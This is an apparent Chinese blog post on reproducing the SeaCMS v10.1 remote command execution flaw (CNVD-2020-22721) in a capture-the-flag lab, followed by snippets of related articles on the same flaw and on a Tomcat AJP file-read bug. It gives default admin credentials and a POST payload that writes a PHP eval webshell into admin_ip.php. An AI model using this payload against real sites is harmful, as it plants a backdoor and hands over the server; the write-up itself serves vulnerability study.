seacms 远程命令执行 (CNVD-2020-22721)

最新推荐文章于 2024-09-24 10:01:23 发布
最新推荐文章于 2024-09-24 10:01:23 发布
阅读量513 收藏 3
点赞数
文章标签: php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63124284/article/details/127478858
版权

1、产品简介

海洋CMS一套程序自适应电脑、手机、平板、APP多个终端入口。

2、漏洞概述

SeaCMS v10.1存在命令执行漏洞,在w1aqhp/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,直接写入文件。攻击者可利用该漏洞执行恶意代码,获取服务器权限。

3、影响范围

v10.1

4、漏洞知识

1、审计

寻找用户可控参数,且存在对用户输入没有或处理不完全情况,直接写入文件,攻击者可利用该漏洞执行恶意代码,获取服务器权限。

2、环境

将php后门代码写入到是php的文件里面,然后再连接该php文件。

5、漏洞复现

1、开启靶场访问IP 后台路径:/manager 后台密码:admin:admin

2、点击系统---->后台ip安全设置 点击确认,并抓包

3、 POST提交的数据中写入后门连接代码 v=0&ip=+11111111111";eval($_POST['cmd']);//

4、访问写入的页面 http://123.58.224.8:44871/manager/admin_ip.php 回显正常

5、后门连接

6、获取flag

恸.283
关注
Seacms漏洞分析利用复现 By Assassin
Assassin
08-03 9899
碰到了cms,之前一直没有真正的分析过,趁着没事干准备复现一个seacms的漏洞复现,但是经过一系列的苦痛挣扎发现—–搭个环境神特么难…一开始我想用ubuntu直接搭建,但是我用的是php7,而各大seacms的安装指南上说…===必读提示=== ------------------------------------- 【1】自适应模板不支持IE6/7/8古董浏览器,会发生错误。国内双核浏览器的兼
74CMS_6.0.48_远程命令执行_CNVD-2021-45280
02-22
本文为 漏洞编号 CNVD-2021-45280 ,即 74CMS 远程命令执行漏洞利用工具源码内容 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 更...
【漏洞复现-seaCms-命令执行】vulfocus/seacms-cnvd_2020_22721
10-15 1823
seaCms-命令执行】后门代码写入可解析文件中
seaCMS v12.9代码审计学习(上半)
最新发布
爆金币了,老登!
09-24 862
php代码审计入门学习
SeaCMS远程命令执行(CNVD-2020-22721)
m0_65150886的博客
02-21 584
SeaCMS v10.1存在命令执行漏洞,在w1aqhp/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,可以直接写入文件。后台路径:/manager 后台密码:admin:admin。2.访问http://ip:port/manager ,进入后台登录页面。海洋CMS是一个自适应电脑、手机、平板、APP多个终端入口的程序。1.访问http://ip:port,出现如下页面,开始实验。5.点击确认,并通过burp进行抓包,修改post请求。3.输入账号密码,进行登录。
WEB 漏洞:seacms 远程命令执行CNVD-2020-22721
2301_79118231的博客
10-27 634
注:个人笔记,并不全面,仅供参考。
seacms_CNVD-2020-22721_v10.1漏洞分析与复现
一个努力学习网安的小牛马
10-27 1347
seacms漏洞复现详情
CNVD-2020-10487-Tomcat-Ajp-lfi-Scanner:CNVD-2020-10487 CVE-2020-1938,扫描仪工具
03-20
python2多线程扫描Tomcat-Ajp协议文件重新定义 刷src分狗的福利poc扩大 poc作者不是本人!!!! 操作 1,将需要扫描的域名/ ip放于ip.txt ip.txt中不需要加协议,某种 ...拿到CNVD-2020-10487-Tomcat-Ajp-lfi.py测
CNVD-2020-10487.7z
09-19
3. CNVD-2020-10487是2020年记录的一个Tomcat漏洞,可能涉及远程代码执行或本地文件包含问题。 4. Ghostcat(CVE-2020-1938)是该漏洞的具体实例,影响Tomcat的AJP连接器,允许攻击者读取服务器文件或执行恶意代码。...
CNVD-2020-10487-Tomcat-ajp-POC:CNVD-2020-10487(CVE-2020-1938),tomcat ajp文件读取长度poc
03-08
CNVD-2020-10487-Tomcat-Ajp-lfi-POC CNVD-2020-10487(CVE-2020-1938),tomcat ajp lfi poc注意:poc.py仅在python2.7上运行,不支持python 3+ 用法:pip install -r requirements.txt python poc.py -p 8009 -...
seacms 远程命令执行CNVD-2020-22721)漏洞复现
weixin_42675091的博客
09-06 1549
seacms 远程命令执行CNVD-2020-22721)漏洞复现
【漏洞复现】五、seacms 远程命令执行CNVD-2020-22721
weixin_52351575的博客
09-21 569
在w1aqhp/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,直接写入文件。攻击者可利用该漏洞执行恶意代码,获取服务器权限。
SeaCMS海洋影视管理系统远程代码执行漏洞复现
holyxp的博客
07-27 1578
所以就去到http://192.168.1.57/SeaCMS_12.9/Upload/install/index.php这个文件来进行安装操作,打开此url会出现下面的界面,然后点击右下角的开始。因为我们是直接在这里安装的,保存了我们的cookie所以我们就直接进来了,如果没有直接进来也不要紧,直接弱密码账户admin 密码admin就行了。很明显我们输入的双引号把变量前面的内容给闭合了,然后后面有双斜杠直接注释了后方的内容,所以就导致了我们利用蚁剑来正向shell。然后下面的随便填,就像这样子。
seacms 远程命令漏洞执行CNVD-2020-22721
xy_wjyjw的博客
10-27 315
点击系统——后台IP安全设置(输入允许 IP:127.0.0.1)打开虚拟终端,输入命令dir /tmp,查看flag。利用漏洞的IP,用蚁剑连接漏洞,连接成功。点击Forward放包,发送到网站。进入bp的网站,并输入url地址。抓包成功,注入一句话密码。填入flag,成功通关。在bp中点击开始抓包。
WEB漏洞之:海洋CMS代码执行CNVD-2020-22721
一位热爱网安的年轻人的博客
11-18 1704
web安全漏洞复现之:海洋cms远程代码执行
seacms admin_ip.php RCE (CVE-2022-48093) 漏洞复现
weixin_68999845的博客
07-31 598
改内容写入的是 .php 文件内的,观察请求的payload是否是恶意的php语句,分析其作用,在本地测试即可(若写入一句话木马,用antswords连接.php文件观察是否成功即可)1.下载源码到本地:https://github.com/seacms-com/seacms。1.登录后台(在配置环境时,后台地址时随机生成的,本次地址为:seacms-master/源码下载url:https://github.com/seacms-com/seacms。以下版本受该漏洞影响:seacms全版本。
cnvd-2020-10487-tomcat-ajp-lfi
10-21
cnvd-2020-10487-tomcat-ajp-lfi是一种利用Tomcat中Apache JServ协议(AJP)的本地文件包含(LFI)漏洞。该漏洞允许攻击者在服务器上执行任意的文件读取和执行操作,从而可能导致敏感信息泄露、甚至服务器完全受控。 攻击者可以通过将恶意的AJP请求发送到Tomcat服务器的8009端口来利用该漏洞。这些请求可以指定要读取的文件路径。由于Tomcat默认配置下AJP协议启用且未进行适当的安全限制,攻击者可以通过这个漏洞读取和执行服务器上的任意文件。 为了防止受到cnvd-2020-10487-tomcat-ajp-lfi漏洞的攻击,可以采取以下措施: 1. 禁用或限制AJPS协议的使用:可以通过修改Tomcat的配置文件来禁用或限制AJPS协议的使用。将AJP协议暴露在公共网络上可能会使服务器容易受到攻击。 2. 更新Tomcat版本:及时安装Tomcat的安全更新和补丁,以保持服务器的安全性和稳定性。 3. 配置Tomcat访问控制:通过配置Tomcat的访问控制策略,限制外部访问与敏感文件相关的路径。 4. 使用防火墙和入侵检测系统(IDS):配置防火墙和IDS以监控和检测异常的网络活动,并及时阻止和警示可疑的AJP请求。 5. 最小权限原则:确保服务器上的所有账户和进程都具有最小权限。这样,即使攻击者成功利用了漏洞,也能够最大限度地减小攻击的影响范围。 综上所述,cnvd-2020-10487-tomcat-ajp-lfi是一种危险的漏洞,但通过采取适当的防护措施,我们可以提高服务器的安全性,避免受到该漏洞的攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值